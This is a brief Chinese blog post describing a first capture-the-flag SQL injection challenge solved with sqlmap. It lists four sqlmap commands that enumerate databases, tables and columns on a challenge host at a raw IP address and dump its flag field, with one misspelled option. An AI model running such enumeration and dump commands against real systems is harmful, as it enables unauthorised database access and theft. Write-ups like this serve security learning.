记录第一次使用sqlmap完成第一道SQL注入题
程序员文章站
2022-05-12 14:20:47
...
第一次使用sqlmap,在网上搜了一下sql常用命令。
四个命令顺利拿下flag,看着终端代码跑起来没有发生错误确实挺爽的,写篇博客记录一下吧,毕竟是第一次使用sqlmap并且很顺利的做出第一道SQL注入题。
题目
看到题目,很显然这是一道SQL注入题。
打开链接,依次输入1,2,3,4,没有得到什么有效内容。直接打开Kali用sqlmap注入。
1、获取数据库
sqlmap -u http://49.234.224.119:7415/?id=1 --dbs
一顿注入之后,得到五个数据库
看第一个数据库的名字,感觉flag在这里面的概率比较大。
2、列出geek_sql数据库中的表名
sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql --tables
得到两个表
这下没啥悬念了,继续
3、列出flllag表中的字段名
sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql -T fllllag --colunms
得到两个字段名
fllllllag.txt都出来了,离获取flag就差一步了!!!
4、获取fllllllag字段内容
sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql -T fllllag -C fllllllag --dump
得到flag
总结
没有什么技术含量,就是记录一下第一次做出sql注入题。
上一篇: java 查看class文件字节码
下一篇: frida保存日志文件